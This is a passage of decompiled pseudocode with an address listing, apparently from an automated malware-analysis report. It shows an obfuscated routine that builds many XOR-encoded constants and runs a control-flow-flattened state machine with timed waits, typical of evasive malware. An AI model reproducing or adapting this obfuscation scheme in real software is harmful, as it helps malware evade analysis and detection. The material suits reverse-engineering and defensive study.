                                                      				_t1358 = 0x35;
                                                      				_v508 = _v508 / _t1358;
                                                      				_v508 = _v508 * 0x5a;
                                                      				_v508 = _v508 ^ 0x00003cc0;
                                                      				_v472 = 0x196b;
                                                      				_v472 = _v472 * 0x16;
                                                      				_v472 = _v472 + 0x8cdc;
                                                      				_v472 = _v472 ^ 0x6344539c;
                                                      				_v472 = _v472 ^ 0x6346dd33;
                                                      				_v212 = 0xb705;
                                                      				_v212 = _v212 << 7;
                                                      				_v212 = _v212 ^ 0x005bff43;
                                                      				_v312 = 0xb48f;
                                                      				_v312 = _v312 + 0xffff701f;
                                                      				_v312 = _v312 >> 0xa;
                                                      				_v312 = _v312 ^ 0x00001302;
                                                      				_v480 = 0xed6e;
                                                      				_v480 = _v480 | 0x6be3eced;
                                                      				_v480 = _v480 + 0x4979;
                                                      				_v480 = _v480 ^ 0x6be47f6f;
                                                      				_v204 = 0xd35b;
                                                      				_v204 = _v204 >> 8;
                                                      				_v204 = _v204 ^ 0x00000622;
                                                      				_v456 = 0xd2fa;
                                                      				_v456 = _v456 << 3;
                                                      				_v456 = _v456 + 0xffffd4b1;
                                                      				_v456 = _v456 << 4;
                                                      				_v456 = _v456 ^ 0x0066f5d7;
                                                      				_v464 = 0x5ee1;
                                                      				_v464 = _v464 >> 9;
                                                      				_v464 = _v464 | 0xf1defbea;
                                                      				_v464 = _v464 ^ 0xf1de88d3;
                                                      				_v304 = 0x5962;
                                                      				_v304 = _v304 ^ 0xf5db8de9;
                                                      				_v304 = _v304 | 0xcdcbde78;
                                                      				_v304 = _v304 ^ 0xfddba732;
                                                      				_v196 = 0xf258;
                                                      				_v196 = _v196 << 7;
                                                      				_v196 = _v196 ^ 0x007971a7;
                                                      				_v448 = 0xfcbd;
                                                      				_v448 = _v448 | 0x39b7afc5;
                                                      				_v448 = _v448 * 0x70;
                                                      				_v448 = _v448 | 0x0e40c0bc;
                                                      				_v448 = _v448 ^ 0x4e7fac25;
                                                      				_v412 = 0x82bf;
                                                      				_v412 = _v412 | 0xb02f6e2d;
                                                      				_v412 = _v412 + 0xffff8626;
                                                      				_v412 = _v412 ^ 0xb02f1cac;
                                                      				_v396 = 0xa4bf;
                                                      				_v396 = _v396 ^ 0xb063c23f;
                                                      				_v396 = _v396 >> 0xf;
                                                      				_v396 = _v396 ^ 0x00011327;
                                                      				_v592 = 0x3de9;
                                                      				_v592 = _v592 + 0xffff189b;
                                                      				_v592 = _v592 * 0x3e;
                                                      				_v592 = _v592 + 0xffff8de2;
                                                      				_v592 = _v592 ^ 0xffd6d64a;
                                                      				_v404 = 0x86b0;
                                                      				_v404 = _v404 >> 5;
                                                      				_v404 = _v404 | 0x66bae114;
                                                      				_v404 = _v404 ^ 0x66bacebe;
                                                      				_v268 = 0x5937;
                                                      				_v268 = _v268 + 0xb57c;
                                                      				_v268 = _v268 ^ 0x00015145;
                                                      				_v280 = 0x9a1f;
                                                      				_v280 = _v280 + 0xffffa2eb;
                                                      				_v280 = _v280 ^ 0x000041dd;
                                                      				_v572 = 0xebd0;
                                                      				_v572 = _v572 ^ 0xedb0bf00;
                                                      				_t1359 = 0x32;
                                                      				_v572 = _v572 / _t1359;
                                                      				_v572 = _v572 << 1;
                                                      				_v572 = _v572 ^ 0x09819433;
                                                      				_v468 = 0x3364;
                                                      				_v468 = _v468 + 0xffff353c;
                                                      				_v468 = _v468 + 0x9f63;
                                                      				_v468 = _v468 | 0x0336228b;
                                                      				_v468 = _v468 ^ 0x0336362e;
                                                      				_v580 = 0x8c54;
                                                      				_v580 = _v580 | 0xf7fe7ffd;
                                                      				_v580 = _v580 << 2;
                                                      				_v580 = _v580 ^ 0xdffb9211;
                                                      				_v400 = 0xc44;
                                                      				_v400 = _v400 | 0x703220aa;
                                                      				_v400 = _v400 + 0x556b;
                                                      				_v400 = _v400 ^ 0x70328daf;
                                                      				_v316 = 0xc625;
                                                      				_t1360 = 0x2f;
                                                      				_v316 = _v316 / _t1360;
                                                      				_v316 = _v316 | 0xad0f9139;
                                                      				_v316 = _v316 ^ 0xad0f9a77;
                                                      				_v352 = 0x3bfc;
                                                      				_v352 = _v352 ^ 0x3d91e4fd;
                                                      				_v352 = _v352 << 4;
                                                      				_v352 = _v352 ^ 0xd91d9102;
                                                      				_v188 = 0xbf9d;
                                                      				_v188 = _v188 ^ 0xeb169de8;
                                                      				_v188 = _v188 ^ 0xeb160ae0;
                                                      				_v272 = 0xf610;
                                                      				_v272 = _v272 >> 0xc;
                                                      				_v272 = _v272 ^ 0x000001f5;
                                                      				_v500 = 0xa952;
                                                      				_v500 = _v500 ^ 0x762f8db9;
                                                      				_t1361 = 0x7b;
                                                      				_v500 = _v500 * 0x6e;
                                                      				_v500 = _v500 | 0x4a766c6e;
                                                      				_v500 = _v500 ^ 0xca77b322;
                                                      				_v420 = 0xb3ce;
                                                      				_v420 = _v420 | 0x5d2bbb9b;
                                                      				_v420 = _v420 + 0x97cf;
                                                      				_v420 = _v420 ^ 0x5d2c523b;
                                                      				_v276 = 0x9f6f;
                                                      				_v276 = _v276 + 0x6bc4;
                                                      				_v276 = _v276 ^ 0x00010aa4;
                                                      				_v504 = 0x2102;
                                                      				_v504 = _v504 >> 7;
                                                      				_v504 = _v504 + 0xffff0b4b;
                                                      				_v504 = _v504 << 4;
                                                      				_v504 = _v504 ^ 0xfff0cd66;
                                                      				_v320 = 0xeb7e;
                                                      				_v320 = _v320 / _t1361;
                                                      				_v320 = _v320 << 0xc;
                                                      				_v320 = _v320 ^ 0x001ed973;
                                                      				_v512 = 0x61aa;
                                                      				_v512 = _v512 | 0xfdc9feff;
                                                      				_t1362 = 0x42;
                                                      				_v512 = _v512 / _t1362;
                                                      				_v512 = _v512 ^ 0x03d81aae;
                                                      				_v540 = 0x929f;
                                                      				_t1363 = 3;
                                                      				_v540 = _v540 * 0x59;
                                                      				_v540 = _v540 ^ 0xd582cfd5;
                                                      				_v540 = _v540 + 0xffff6c6f;
                                                      				_v540 = _v540 ^ 0xd5af900c;
                                                      				_v332 = 0xd4e0;
                                                      				_v332 = _v332 | 0xf04e42e2;
                                                      				_v332 = _v332 ^ 0xcda3b68f;
                                                      				_v332 = _v332 ^ 0x3ded4bfa;
                                                      				_v192 = 0xb136;
                                                      				_v192 = _v192 >> 6;
                                                      				_v192 = _v192 ^ 0x00000257;
                                                      				_v460 = 0xb4b8;
                                                      				_v460 = _v460 + 0xffff8599;
                                                      				_v460 = _v460 / _t1363;
                                                      				_v460 = _v460 + 0x6faa;
                                                      				_v460 = _v460 ^ 0x0000d8b1;
                                                      				_v548 = 0x6ab8;
                                                      				_t1364 = 0x7c;
                                                      				_v548 = _v548 * 0x71;
                                                      				_v548 = _v548 / _t1364;
                                                      				_v548 = _v548 << 4;
                                                      				_v548 = _v548 ^ 0x00063121;
                                                      				_v260 = 0x579;
                                                      				_v260 = _v260 >> 0xd;
                                                      				_v260 = _v260 ^ 0x00001a36;
                                                      				_v380 = 0x5d49;
                                                      				_t1365 = 0x3a;
                                                      				_v380 = _v380 * 0x2a;
                                                      				_v380 = _v380 << 0xf;
                                                      				_v380 = _v380 ^ 0xa6fd05f8;
                                                      				_v584 = 0x9575;
                                                      				_v584 = _v584 << 0xe;
                                                      				_v584 = _v584 >> 0xb;
                                                      				_v584 = _v584 >> 9;
                                                      				_v584 = _v584 ^ 0x00001953;
                                                      				_v388 = 0x71ed;
                                                      				_v388 = _v388 | 0xfa0f4c1a;
                                                      				_v388 = _v388 * 0x21;
                                                      				_v388 = _v388 ^ 0x3bff2db3;
                                                      				_v576 = 0x40ac;
                                                      				_v576 = _v576 ^ 0x72872e3c;
                                                      				_v576 = _v576 >> 3;
                                                      				_v576 = _v576 >> 6;
                                                      				_v576 = _v576 ^ 0x00395cc8;
                                                      				_v356 = 0x9a14;
                                                      				_v356 = _v356 * 5;
                                                      				_v356 = _v356 / _t1365;
                                                      				_v356 = _v356 ^ 0x00000d15;
                                                      				_v364 = 0x97d4;
                                                      				_v364 = _v364 + 0xffff1281;
                                                      				_v364 = _v364 << 0xd;
                                                      				_v364 = _v364 ^ 0xf54ac276;
                                                      				_v568 = 0x9f15;
                                                      				_v568 = _v568 + 0xffff08f5;
                                                      				_v568 = _v568 * 0x54;
                                                      				_v568 = _v568 + 0x8411;
                                                      				_v568 = _v568 ^ 0xffe3bf59;
                                                      				_v372 = 0xb5ac;
                                                      				_v372 = _v372 | 0xef292143;
                                                      				_v372 = _v372 << 0xc;
                                                      				_v372 = _v372 ^ 0x9b5ed191;
                                                      				_v560 = 0xc079;
                                                      				_v560 = _v560 << 6;
                                                      				_v560 = _v560 | 0x75378a54;
                                                      				_v560 = _v560 + 0xffff0fb6;
                                                      				_v560 = _v560 ^ 0x7536a745;
                                                      				_v252 = 0xffdd;
                                                      				_v252 = _v252 ^ 0x94fd4b64;
                                                      				_v252 = _v252 ^ 0x94fd9346;
                                                      				_v344 = 0x2817;
                                                      				_v344 = _v344 + 0xffffb9ce;
                                                      				_v344 = _v344 >> 5;
                                                      				_v344 = _v344 ^ 0x07ffc707;
                                                      				_v544 = 0xc4c3;
                                                      				_v544 = _v544 << 4;
                                                      				_v544 = _v544 | 0xf37ee84d;
                                                      				_v544 = _v544 >> 9;
                                                      				_v544 = _v544 ^ 0x0079cb8a;
                                                      				_v244 = 0xbe83;
                                                      				_v244 = _v244 << 9;
                                                      				_v244 = _v244 ^ 0x017d70fa;
                                                      				_v552 = 0x87b1;
                                                      				_v552 = _v552 + 0xe2ec;
                                                      				_v552 = _v552 + 0xffff8757;
                                                      				_t1366 = 0x57;
                                                      				_v552 = _v552 / _t1366;
                                                      				_v552 = _v552 ^ 0x00000cf8;
                                                      				_v524 = 0x9ee8;
                                                      				_v524 = _v524 >> 0xc;
                                                      				_v524 = _v524 + 0xffffea20;
                                                      				_v524 = _v524 + 0x67c2;
                                                      				_v524 = _v524 ^ 0x0000257d;
                                                      				_v240 = 0x3e44;
                                                      				_t1367 = 0x4e;
                                                      				_v240 = _v240 * 0x26;
                                                      				_v240 = _v240 ^ 0x000944b9;
                                                      				_v184 = 0xb17e;
                                                      				_v184 = _v184 + 0xc83;
                                                      				_v184 = _v184 ^ 0x00008468;
                                                      				_v428 = 0x2247;
                                                      				_v428 = _v428 >> 6;
                                                      				_v428 = _v428 | 0xbf36a58a;
                                                      				_v428 = _v428 ^ 0xbf36942e;
                                                      				_v492 = 0xaf88;
                                                      				_v492 = _v492 | 0x489e17bf;
                                                      				_v492 = _v492 / _t1367;
                                                      				_t1368 = 0x59;
                                                      				_v492 = _v492 / _t1368;
                                                      				_v492 = _v492 ^ 0x00028cc4;
                                                      				_v236 = 0x579b;
                                                      				_v236 = _v236 | 0x958cbadb;
                                                      				_v236 = _v236 ^ 0x958cb114;
                                                      				_v528 = 0x596e;
                                                      				_t1369 = 0x25;
                                                      				_v528 = _v528 / _t1369;
                                                      				_v528 = _v528 + 0xffff0f20;
                                                      				_v528 = _v528 * 0x71;
                                                      				_v528 = _v528 ^ 0xff96cb88;
                                                      				_v384 = 0xdb4f;
                                                      				_v384 = _v384 / _t1340;
                                                      				_v384 = _v384 ^ 0x047c7efe;
                                                      				_v384 = _v384 ^ 0x047c6269;
                                                      				_v256 = 0x2cf1;
                                                      				_v256 = _v256 | 0x808b3cca;
                                                      				_v256 = _v256 ^ 0x808b1c76;
                                                      				_v300 = 0x3901;
                                                      				_t1370 = 0x6d;
                                                      				_v300 = _v300 * 0xa;
                                                      				_v300 = _v300 >> 6;
                                                      				_v300 = _v300 ^ 0x0000212b;
                                                      				_v368 = 0x796e;
                                                      				_v368 = _v368 * 0xc;
                                                      				_v368 = _v368 * 0x3e;
                                                      				_v368 = _v368 ^ 0x0160b691;
                                                      				_v444 = 0xa0b9;
                                                      				_v444 = _v444 | 0x9ca1dfa8;
                                                      				_v444 = _v444 / _t1370;
                                                      				_v444 = _v444 * 0x63;
                                                      				_v444 = _v444 ^ 0x8e437e2f;
                                                      				_v532 = 0x8c65;
                                                      				_v532 = _v532 * 0x56;
                                                      				_v532 = _v532 << 0xa;
                                                      				_v532 = _v532 * 0x21;
                                                      				_v532 = _v532 ^ 0x519e8d1f;
                                                      				_v556 = 0x4a7f;
                                                      				_v556 = _v556 << 0xf;
                                                      				_v556 = _v556 + 0xa5c2;
                                                      				_v556 = _v556 | 0xa1707f4f;
                                                      				_v556 = _v556 ^ 0xa5705fb9;
                                                      				_v436 = 0x3fda;
                                                      				_v436 = _v436 * 0x3e;
                                                      				_v436 = _v436 + 0x1364;
                                                      				_v436 = _v436 ^ 0xe1573554;
                                                      				_v436 = _v436 ^ 0xe158f097;
                                                      				_v564 = 0x6043;
                                                      				_v564 = _v564 | 0xb689377f;
                                                      				_v564 = _v564 >> 8;
                                                      				_v564 = _v564 ^ 0x2a62422c;
                                                      				_v564 = _v564 ^ 0x2ad4e10a;
                                                      				_v328 = 0x5c6e;
                                                      				_v328 = _v328 ^ 0x42ae754b;
                                                      				_v328 = _v328 + 0xbaa3;
                                                      				_v328 = _v328 ^ 0x42aeef53;
                                                      				_v228 = 0xef63;
                                                      				_v228 = _v228 >> 0xe;
                                                      				_v228 = _v228 ^ 0x00001997;
                                                      				_v336 = 0x5044;
                                                      				_v336 = _v336 >> 0xf;
                                                      				_v336 = _v336 + 0xffffb35b;
                                                      				_v336 = _v336 ^ 0xffffef5d;
                                                      				_v440 = 0x7004;
                                                      				_v440 = _v440 * 0x7e;
                                                      				_v440 = _v440 * 0x13;
                                                      				_v440 = _v440 << 0x10;
                                                      				_v440 = _v440 ^ 0x85685bd2;
                                                      				_v164 = 0x75ea;
                                                      				_v164 = _v164 << 0xb;
                                                      				_v164 = _v164 ^ 0x03af40f2;
                                                      				_v224 = 0xc6cf;
                                                      				_v224 = _v224 << 9;
                                                      				_v224 = _v224 ^ 0x018dae64;
                                                      				_v160 = 0xb450;
                                                      				_t1371 = 0x38;
                                                      				_v160 = _v160 / _t1371;
                                                      				_v160 = _v160 ^ 0x00003b29;
                                                      				_v476 = 0xddbc;
                                                      				_v476 = _v476 ^ 0xc2407c95;
                                                      				_v476 = _v476 + 0xd5a3;
                                                      				_v476 = _v476 + 0x8192;
                                                      				_v476 = _v476 ^ 0xc241f0f2;
                                                      				_v216 = 0xdff2;
                                                      				_t1372 = 0x2c;
                                                      				_v216 = _v216 * 0x1c;
                                                      				_v216 = _v216 ^ 0x00187743;
                                                      				_v516 = 0x400b;
                                                      				_v516 = _v516 / _t1218;
                                                      				_v516 = _v516 + 0xc836;
                                                      				_v516 = _v516 >> 0xa;
                                                      				_v516 = _v516 ^ 0x00004f08;
                                                      				_v292 = 0xdc4e;
                                                      				_v292 = _v292 * 0x16;
                                                      				_v292 = _v292 * 0x7f;
                                                      				_v292 = _v292 ^ 0x09643e15;
                                                      				_v600 = 0x4d46;
                                                      				_v600 = _v600 + 0xffff0db8;
                                                      				_v600 = _v600 + 0x84f3;
                                                      				_v600 = _v600 + 0xc039;
                                                      				_v600 = _v600 ^ 0x0000d5ed;
                                                      				_v432 = 0x8bd1;
                                                      				_v432 = _v432 << 0xc;
                                                      				_v432 = _v432 + 0x8a22;
                                                      				_v432 = _v432 / _t1372;
                                                      				_v432 = _v432 ^ 0x003284c4;
                                                      				_v288 = 0x245c;
                                                      				_v288 = _v288 | 0x526859ae;
                                                      				_v288 = _v288 * 0xc;
                                                      				_v288 = _v288 ^ 0xdce5b0ef;
                                                      				while(1) {
                                                      					L1:
                                                      					do {
                                                      						while(1) {
                                                      							L2:
                                                      							_t1391 = _t1225 - 0x1bd1caec;
                                                      							if(_t1391 <= 0) {
                                                      							}
                                                      							L3:
                                                      							if(_t1391 == 0) {
                                                      								__eflags = E002402C3();
                                                      								if(__eflags == 0) {
                                                      									_t1135 = E00237903();
                                                      									asm("sbb ecx, ecx");
                                                      									_t1225 = ( ~_t1135 & 0x0209e55e) + 0x3544b2a;
                                                      									while(1) {
                                                      										L2:
                                                      										_t1391 = _t1225 - 0x1bd1caec;
                                                      										if(_t1391 <= 0) {
                                                      										}
                                                      										goto L3;
                                                      									}
                                                      								}
                                                      								_t1144 = E00237903();
                                                      								asm("sbb ecx, ecx");
                                                      								_t1257 =  ~_t1144 & 0x03449ef9;
                                                      								L32:
                                                      								_t1225 = _t1257 + 0xda99535;
                                                      								while(1) {
                                                      									L2:
                                                      									_t1391 = _t1225 - 0x1bd1caec;
                                                      									if(_t1391 <= 0) {
                                                      									}
                                                      									goto L54;
                                                      								}
                                                      								goto L3;
                                                      							}
                                                      							_t1392 = _t1225 - 0x10ee342e;
                                                      							if(_t1392 > 0) {
                                                      								__eflags = _t1225 - 0x15603e6b;
                                                      								if(__eflags > 0) {
                                                      									__eflags = _t1225 - 0x159448ba;
                                                      									if(_t1225 == 0x159448ba) {
                                                      										E0023C562(_v540,  &_v80, _v332, _v192);
                                                      										_t1225 = 0x17799f6a;
                                                      										continue;
                                                      									}
                                                      									__eflags = _t1225 - 0x1653011b;
                                                      									if(_t1225 == 0x1653011b) {
                                                      										E0023F536(_v384, _v256, _v300, _v140);
                                                      										_t1225 = 0x21caf663;
                                                      										continue;
                                                      									}
                                                      									__eflags = _t1225 - 0x17799f6a;
                                                      									if(_t1225 == 0x17799f6a) {
                                                      										_t1138 = E00239A37( &_v112,  &_v132, _v460, _v548);
                                                      										asm("sbb ecx, ecx");
                                                      										_t1225 = ( ~_t1138 & 0x1d975e2e) + 0x7ff6f9b;
                                                      										continue;
                                                      									}
                                                      									__eflags = _t1225 - 0x1b19f75b;
                                                      									if(_t1225 != 0x1b19f75b) {
                                                      										break;
                                                      									}
                                                      									_t1144 = E002473AC();
                                                      									asm("sbb ecx, ecx");
                                                      									_t1225 = ( ~_t1144 & 0x1b44a5c9) + 0x1bd1caec;
                                                      									continue;
                                                      								}
                                                      								if(__eflags == 0) {
                                                      									_t1144 = E0023F444(_t1225);
                                                      									L112:
                                                      									return _t1144;
                                                      								}
                                                      								__eflags = _t1225 - 0x10f69b27;
                                                      								if(_t1225 == 0x10f69b27) {
                                                      									_t1144 = E0024AB96();
                                                      									_t1225 = 0x326a8235;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0x11454f34;
                                                      								if(_t1225 == 0x11454f34) {
                                                      									_t1144 = E0023D7EB();
                                                      									_t1225 = 0x356cf65c;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0x11dfa862;
                                                      								if(__eflags == 0) {
                                                      									_t1225 = 0x376e2cde;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0x13c96655;
                                                      								if(_t1225 != 0x13c96655) {
                                                      									break;
                                                      								}
                                                      								_t1144 = E002362A3();
                                                      								goto L112;
                                                      							}
                                                      							if(_t1392 == 0) {
                                                      								_t1140 = E0023153C();
                                                      								asm("sbb ecx, ecx");
                                                      								_t1257 =  ~_t1140 & 0x061fd120;
                                                      								__eflags = _t1257;
                                                      								goto L32;
                                                      							}
                                                      							_t1393 = _t1225 - 0x55e3088;
                                                      							if(_t1393 > 0) {
                                                      								__eflags = _t1225 - 0x7ff6f9b;
                                                      								if(_t1225 == 0x7ff6f9b) {
                                                      									_t1336 = _v436;
                                                      									E0023F536(_v556, _t1336, _v564, _v80);
                                                      									_t1225 = 0x3140af28;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0xb356ed5;
                                                      								if(_t1225 == 0xb356ed5) {
                                                      									_t1144 = E0023C2E2();
                                                      									_v104 = _t1144;
                                                      									_t1225 = 0x288da576;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0xd8c7d27;
                                                      								if(_t1225 == 0xd8c7d27) {
                                                      									_push( &_v68);
                                                      									_t1336 = _v572;
                                                      									_t1144 = E00242349(_v280, _t1336, _v468, _v580, _t1225);
                                                      									_t1387 = _t1387 + 0x10;
                                                      									__eflags = _t1144;
                                                      									if(__eflags == 0) {
                                                      										L28:
                                                      										_t1225 = 0x15603e6b;
                                                      										continue;
                                                      									}
                                                      									_t1336 = _v316;
                                                      									_v112 =  &_v68;
                                                      									_t1144 = E0023DFE2(_v400, _t1336,  &_v68);
                                                      									_v108 = _t1144;
                                                      									_t1225 = 0x2267098;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0xda99535;
                                                      								if(_t1225 != 0xda99535) {
                                                      									break;
                                                      								}
                                                      								E00247D03();
                                                      								_t1144 = E00238317();
                                                      								L25:
                                                      								_t1225 = 0x23233137;
                                                      								continue;
                                                      							}
                                                      							if(_t1393 == 0) {
                                                      								_t1144 = E002463C1();
                                                      								_t1225 = 0x3544b2a;
                                                      								continue;
                                                      							}
                                                      							if(_t1225 == 0x13a2b08) {
                                                      								_t1225 = 0x282d346f;
                                                      								continue;
                                                      							}
                                                      							if(_t1225 == 0x2267098) {
                                                      								_t1144 = E0024611C();
                                                      								_v72 = _t1144;
                                                      								_t1225 = 0xb356ed5;
                                                      								continue;
                                                      							}
                                                      							if(_t1225 == 0x2a32d0a) {
                                                      								_t1225 = 0x34a6f88;
                                                      								continue;
                                                      							}
                                                      							if(_t1225 == 0x34a6f88) {
                                                      								_t1144 = E00243632(__eflags);
                                                      								__eflags = _t1144;
                                                      								if(__eflags == 0) {
                                                      									goto L112;
                                                      								} else {
                                                      									_t1225 = 0x3833d453;
                                                      									continue;
                                                      								}
                                                      							}
                                                      							if(_t1225 != 0x3544b2a) {
                                                      								break;
                                                      							} else {
                                                      								_t1144 = E00241BDF();
                                                      								_t1225 = 0x371670b5;
                                                      								continue;
                                                      							}
                                                      							L54:
                                                      							__eflags = _t1225 - 0x2e6b2744;
                                                      							if(__eflags > 0) {
                                                      								__eflags = _t1225 - 0x35bdcd5f;
                                                      								if(__eflags > 0) {
                                                      									__eflags = _t1225 - 0x371670b5;
                                                      									if(_t1225 == 0x371670b5) {
                                                      										E00248F49();
                                                      										_t1225 = 0x30491502;
                                                      										break;
                                                      									}
                                                      									__eflags = _t1225 - 0x376e2cde;
                                                      									if(__eflags == 0) {
                                                      										_v148 = E0023F85D(_v472, __eflags,  &_v144, _v212, _v312, _v480);
                                                      										E002348BD( &_v148, _v204, _v456, _v464);
                                                      										_t1387 = _t1387 + 0x18;
                                                      										_t1336 = _v148;
                                                      										E00242025(_v304, _t1336, _v196, _v448);
                                                      										_t1225 = 0x13a2b08;
                                                      										continue;
                                                      									}
                                                      									__eflags = _t1225 - 0x37f9587b;
                                                      									if(__eflags == 0) {
                                                      										_v96 = 0x1346150;
                                                      										_t1225 = 0x2e6b2744;
                                                      										continue;
                                                      									}
                                                      									__eflags = _t1225 - 0x3833d453;
                                                      									if(_t1225 != 0x3833d453) {
                                                      										break;
                                                      									}
                                                      									_t1144 = E00246014(); // executed
                                                      									_t1225 = 0x1e57e2ba;
                                                      									continue;
                                                      								}
                                                      								if(__eflags == 0) {
                                                      									_t1336 = _v320;
                                                      									_t1144 = E0024A0AF(_v504, _t1336, _v512,  &_v88);
                                                      									_t1225 = 0x159448ba;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0x30491502;
                                                      								if(_t1225 == 0x30491502) {
                                                      									_t1144 = E0023EE78();
                                                      									__eflags = _t1144;
                                                      									if(__eflags == 0) {
                                                      										goto L112;
                                                      									}
                                                      									_t1225 = 0x2a91822d;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0x3140af28;
                                                      								if(_t1225 == 0x3140af28) {
                                                      									_t1336 = _v228;
                                                      									_t1144 = E0023F536(_v328, _t1336, _v336, _v88);
                                                      									goto L25;
                                                      								}
                                                      								__eflags = _t1225 - 0x326a8235;
                                                      								if(__eflags == 0) {
                                                      									_t1336 =  &_v124;
                                                      									_t1144 = E002471EF(_t1336, __eflags, _v528);
                                                      									__eflags = _t1144;
                                                      									if(__eflags != 0) {
                                                      										asm("xorps xmm0, xmm0");
                                                      										asm("movlpd [esp+0x1d0], xmm0");
                                                      									}
                                                      									L95:
                                                      									_t1225 = 0x1653011b;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0x356cf65c;
                                                      								if(_t1225 != 0x356cf65c) {
                                                      									break;
                                                      								}
                                                      								_t1144 = E002467F0();
                                                      								_t1225 = 0x13c96655;
                                                      								continue;
                                                      							}
                                                      							if(__eflags == 0) {
                                                      								_v92 = 0x1388;
                                                      								_t1225 = 0x35bdcd5f;
                                                      								continue;
                                                      							}
                                                      							__eflags = _t1225 - 0x23233137;
                                                      							if(__eflags > 0) {
                                                      								__eflags = _t1225 - 0x2596cdc9;
                                                      								if(_t1225 == 0x2596cdc9) {
                                                      									_push(_v388);
                                                      									_push(_v584);
                                                      									_push(_v380);
                                                      									_t1336 = _v260;
                                                      									_push( &_v132);
                                                      									_push( &_v140);
                                                      									_t1172 = E00239FDC(_t1336);
                                                      									_t1389 = _t1387 + 0x14;
                                                      									__eflags = _t1172;
                                                      									if(_t1172 == 0) {
                                                      										E0023790F();
                                                      										E002378A5(_t1225, _t1225, 0x1f40, _t1225, 0xfa0);
                                                      										_t1387 = _t1389 + 0x10;
                                                      										_t1144 = E00238317();
                                                      										_t1225 = 0x21caf663;
                                                      										asm("adc ebx, 0x0");
                                                      									} else {
                                                      										_t1384 = 0x35bdcd5f;
                                                      										_t1213 = E002378A5(_t1225, _t1225, 0xef420, _t1225, 0xdbba0);
                                                      										_t1387 = _t1389 + 0x10;
                                                      										_t1144 = E00238317();
                                                      										_t1224 = _t1336;
                                                      										_t1348 = _t1144 + _t1213;
                                                      										_t1225 = 0x21c9d3c7;
                                                      										asm("adc ebx, 0x0");
                                                      									}
                                                      									while(1) {
                                                      										L1:
                                                      										goto L2;
                                                      									}
                                                      								}
                                                      								__eflags = _t1225 - 0x282d346f;
                                                      								if(_t1225 == 0x282d346f) {
                                                      									_t1384 = 0xd8c7d27;
                                                      									_t1186 = E002378A5(_t1225, _t1225, 0x2ee0, _t1225, 0xfa0);
                                                      									_t1387 = _t1387 + 0x10;
                                                      									_t1144 = E00238317();
                                                      									_t1224 = _t1336;
                                                      									_t1348 = _t1144 + _t1186;
                                                      									_t1225 = 0x23233137;
                                                      									asm("adc ebx, 0x0");
                                                      									goto L1;
                                                      								}
                                                      								__eflags = _t1225 - 0x288da576;
                                                      								if(_t1225 == 0x288da576) {
                                                      									_t1144 = E0023F326();
                                                      									_v100 = _t1144;
                                                      									_t1225 = 0x37f9587b;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t1225 - 0x2a91822d;
                                                      								if(_t1225 != 0x2a91822d) {
                                                      									break;
                                                      								}
                                                      								E00243895();
                                                      								_t1144 = E00237903();
                                                      								asm("sbb ecx, ecx");
                                                      								_t1225 = ( ~_t1144 & 0xdbd858d8) + 0x356cf65c;
                                                      								continue;
                                                      							}
                                                      							if(__eflags == 0) {
                                                      								_t1144 = _t1348 | _t1224;
                                                      								__eflags = _t1144;
                                                      								if(_t1144 != 0) {
                                                      									_t1199 = E002378A5(_t1225, _t1225, 0x4b0, _t1225, 0x190);
                                                      									_t1387 = _t1387 + 8;
                                                      									_t1336 = _t1199;
                                                      									_t1144 = E00243F62(_t1336, __eflags);
                                                      									__eflags = _t1144;
                                                      									if(__eflags != 0) {
                                                      										goto L28;
                                                      									}
                                                      									_t1144 = E00238317();
                                                      									__eflags = _t1336 - _t1224;
                                                      									if(__eflags < 0) {
                                                      										L74:
                                                      										_t1225 = 0x23233137;
                                                      										break;
                                                      									}
                                                      									if(__eflags > 0) {
                                                      										goto L69;
                                                      									}
                                                      									__eflags = _t1144 - _t1348;
                                                      									if(_t1144 >= _t1348) {
                                                      										goto L69;
                                                      									}
                                                      									goto L74;
                                                      								}
                                                      								L69:
                                                      								_t1225 = _t1384;
                                                      								break;
                                                      							}
                                                      							__eflags = _t1225 - 0x1d55cf6f;
                                                      							if(_t1225 == 0x1d55cf6f) {
                                                      								_t1144 = E002412E2();
                                                      								goto L112;
                                                      							}
                                                      							__eflags = _t1225 - 0x1e57e2ba;
                                                      							if(_t1225 == 0x1e57e2ba) {
                                                      								_t1144 = E00244B41();
                                                      								__eflags = _t1144;
                                                      								if(_t1144 == 0) {
                                                      									goto L112;
                                                      								}
                                                      								_t1144 = E002484C4(_v360);
                                                      								_t1225 = 0x1b19f75b;
                                                      								continue;
                                                      							}
                                                      							__eflags = _t1225 - 0x21c9d3c7;
                                                      							if(_t1225 == 0x21c9d3c7) {
                                                      								_t1336 = _v524;
                                                      								_t1144 = E00243FE7( &_v124, _t1336, _v240,  &_v140);
                                                      								__eflags = _t1144;
                                                      								if(__eflags == 0) {
                                                      									goto L95;
                                                      								}
                                                      								_t1144 = E002467E9();
                                                      								__eflags = _v116;
                                                      								_t1225 = 0x10f69b27;
                                                      								if(__eflags != 0) {
                                                      									__eflags = _v116 - 7;
                                                      									_t1225 =  ==  ? 0x1d55cf6f : 0x10f69b27;
                                                      								}
                                                      								continue;
                                                      							}
                                                      							__eflags = _t1225 - 0x21caf663;
                                                      							if(_t1225 != 0x21caf663) {
                                                      								break;
                                                      							}
                                                      							_t1336 = _v444;
                                                      							_t1144 = E0023F536(_v368, _t1336, _v532, _v132);
                                                      							_t1225 = 0x7ff6f9b;
                                                      						}
                                                      						__eflags = _t1225 - 0x3adf5394;
                                                      					} while (__eflags != 0);
                                                      					goto L112;
                                                      				}
                                                      			}
                                                      0x00233c71
                                                      0x00233c79
                                                      0x00233c7e
                                                      0x00233c86
                                                      0x00233c8e
                                                      0x00233c99
                                                      0x00233ca4
                                                      0x00233caf
                                                      0x00233cba
                                                      0x00233cc5
                                                      0x00233ccd
                                                      0x00233cd8
                                                      0x00233ce3
                                                      0x00233ceb
                                                      0x00233cf6
                                                      0x00233d01
                                                      0x00233d14
                                                      0x00233d23
                                                      0x00233d2a
                                                      0x00233d32
                                                      0x00233d3d
